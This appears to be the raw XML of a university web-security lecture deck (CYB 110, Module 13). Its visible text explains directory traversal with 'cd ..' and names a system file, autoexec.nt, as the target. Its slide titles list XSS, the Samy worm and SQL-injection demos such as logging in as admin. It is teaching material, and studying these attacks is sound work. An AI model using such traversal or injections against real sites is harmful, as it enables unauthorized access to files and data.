              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>requested</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>file,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>autoexec.nt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400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2F5A62-0136-2B47-AC97-51F2AA14B873}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2015-09-06 at 4.26.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74" y="2833059"/>
            <a:ext cx="8177774" cy="537560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4736307" y="417910"/>
            <a:ext cx="3868341" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>cd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>parent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>current</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>cd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>../..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>grandparent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>current</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>location</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9456471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TITLE" val="8D8LTkDP"/>
  <p:tag name="TAG_BACKING_FORM_KEY" val="525972-https://vandalsuidaho-my.sharepoint.com/personal/jimaf_uidaho_edu/documents/cybersecurity degree/dual credit cyb 110/lectures from spring cyb 110/lecture 1 - introduction.pptx"/>
  <p:tag name="ARTICULATE_PRESENTER_VERSION" val="8"/>
  <p:tag name="ARTICULATE_PROJECT_OPEN" val="0"/>
  <p:tag name="ARTICULATE_SLIDE_COUNT" val="3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I_ED_template_201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_ENG_template_2015 (1).potx" id="{3BF9F4F5-4290-4F90-98F1-89A3765D9459}" vid="{D534E3E7-C2A2-4DEE-BFED-469821C43149}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="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dirty="0" smtClean="0"/>
        </a:defPPr>
      </a:lstStyle>
    </a:txDef>
  </a:objectDefaults>
  <a:extraClrSchemeLst/>
  <a:extLst>
    <a:ext uri="{05A4C25C-085E-4340-85A3-A5531E510DB2}">
      <thm15:themeFamily xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" name="UI_ENG_template_2015 (1).potx" id="{3BF9F4F5-4290-4F90-98F1-89A3765D9459}" vid="{5D1A1C26-7DCE-4529-8BF2-32FF51C5B4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760E5FD0473D4CB63D0154B06E516F" ma:contentTypeVersion="12" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="09edf825b5912388e7ca2ea6d1de1557">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="7fe36b7c-cba8-4215-9209-ceaf5296f0ff" xmlns:ns4="ff1ac381-a94a-4da3-8726-f5a4c8832f39" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="dc34467f3000ac1b9c3f8caf7263c8bd" ns3:_="" ns4:_="">
    <xsd:import namespace="7fe36b7c-cba8-4215-9209-ceaf5296f0ff"/>
    <xsd:import namespace="ff1ac381-a94a-4da3-8726-f5a4c8832f3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e36b7c-cba8-4215-9209-ceaf5296f0f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f1ac381-a94a-4da3-8726-f5a4c8832f39"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A4B46C-3CCA-487D-A9B7-2402D13DBD6E}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{E23C1EBF-B7EE-4343-A033-1E65E46B396D}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://www.w3.org/XML/1998/namespace"/>
    <ds:schemaRef ds:uri="7fe36b7c-cba8-4215-9209-ceaf5296f0ff"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/elements/1.1/"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/dcmitype/"/>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schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="ff1ac381-a94a-4da3-8726-f5a4c8832f39"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{72D7F16E-42E2-4156-9AF2-3950717BB8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e36b7c-cba8-4215-9209-ceaf5296f0ff"/>
    <ds:schemaRef ds:uri="ff1ac381-a94a-4da3-8726-f5a4c8832f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UI_ENG_template_2015</Template>
  <TotalTime>1206</TotalTime>
  <Words>2943</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>267</Paragraphs>
  <Slides>45</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Ringside Narrow A</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Rockwell</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>UI_ED_template_2015</vt:lpstr>
      <vt:lpstr>Title</vt:lpstr>
      <vt:lpstr>CYB 110 Cybersecurity and privacy Module 13 - web security  Jim Alves-Foss and Jia Song</vt:lpstr>
      <vt:lpstr>Web application security</vt:lpstr>
      <vt:lpstr>Malicious web content</vt:lpstr>
      <vt:lpstr>Substitute content on a real web site</vt:lpstr>
      <vt:lpstr>Web bug</vt:lpstr>
      <vt:lpstr>Clickjacking</vt:lpstr>
      <vt:lpstr>Drive-By Download</vt:lpstr>
      <vt:lpstr>Obtaining user or website data</vt:lpstr>
      <vt:lpstr>Dot-Dot-Slash</vt:lpstr>
      <vt:lpstr>Cross-site scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-site scripting (XSS)</vt:lpstr>
      <vt:lpstr>A simple XSS attack</vt:lpstr>
      <vt:lpstr>Another xss EXAMPLE</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Inject the Code Into a Profile</vt:lpstr>
      <vt:lpstr>samy worm</vt:lpstr>
      <vt:lpstr>Self-Propagation XSS Worm</vt:lpstr>
      <vt:lpstr>XSS Attack</vt:lpstr>
      <vt:lpstr>Damage Caused by XSS</vt:lpstr>
      <vt:lpstr>Countermeasures</vt:lpstr>
      <vt:lpstr>Countermeasures to Injections</vt:lpstr>
      <vt:lpstr>demo:  SQL injection</vt:lpstr>
      <vt:lpstr>SQL Queries</vt:lpstr>
      <vt:lpstr>SQL injection</vt:lpstr>
      <vt:lpstr>SQL Tutorial: SELECT Statement</vt:lpstr>
      <vt:lpstr>SQL Tutorial: where clause</vt:lpstr>
      <vt:lpstr>SQL Tutorial: WHERE Clause</vt:lpstr>
      <vt:lpstr>SQL Tutorial: WHERE Clause</vt:lpstr>
      <vt:lpstr>SQL Tutorial: UPDATE Statement</vt:lpstr>
      <vt:lpstr>SQL Tutorial: Comments</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Interacting with Database in Web Application</vt:lpstr>
      <vt:lpstr>Getting Data from User</vt:lpstr>
      <vt:lpstr>How Web Application server Interact with Database</vt:lpstr>
      <vt:lpstr>Interact with database </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>unsafe_home.php</vt:lpstr>
      <vt:lpstr>Demo #1 ”login” as admin</vt:lpstr>
      <vt:lpstr>Demo #2 Update my salary </vt:lpstr>
      <vt:lpstr>Construct query to update info</vt:lpstr>
      <vt:lpstr>Demo #2 Update my salary </vt:lpstr>
      <vt:lpstr>  Please attribute Dr. Jim Alves-Foss and Dr. Jia Song, University of Idaho         Except where otherwise noted, this work is licensed under https://creativecommons.org/licenses/by-nc-sa/4.0/  Not withstanding the non-commercial license terms, non-profit educational institutions are granted a non-exclusive license to adapt and use this material, with attribution.  Creative Commons and the double C in a circle are registered trademarks of Creative commons in the United States and other countries. Third party marks and brands are the property of their respective holders.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Diversifying binaries for improved security  Jim Alves-Foss</dc:title>
  <dc:creator>Alves-Foss, James (jimaf@uidaho.edu)</dc:creator>
  <cp:lastModifiedBy>Song, Jia (jsong@uidaho.edu)</cp:lastModifiedBy>
  <cp:revision>21</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-10-29T15:40:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-17T05:59:00Z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Presentation1</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ContentTypeId">
    <vt:lpwstr>0x01010024760E5FD0473D4CB63D0154B06E516F</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ArticulateUseProject">
    <vt:lpwstr>1</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="ArticulateProjectVersion">
    <vt:lpwstr>8</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="ArticulateGUID">
    <vt:lpwstr>0A0575A7-34C7-4404-B28C-BD2DDDA0BEB3</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="ArticulateProjectFull">
    <vt:lpwstr>https://vandalsuidaho-my.sharepoint.com/personal/jimaf_uidaho_edu/Documents/Cybersecurity Degree/Dual Credit CYB 110/Lectures from Spring CYB 110\Lecture 1 - Introduction.ppta</vt:lpwstr>
  </property>
</Properties>
</file>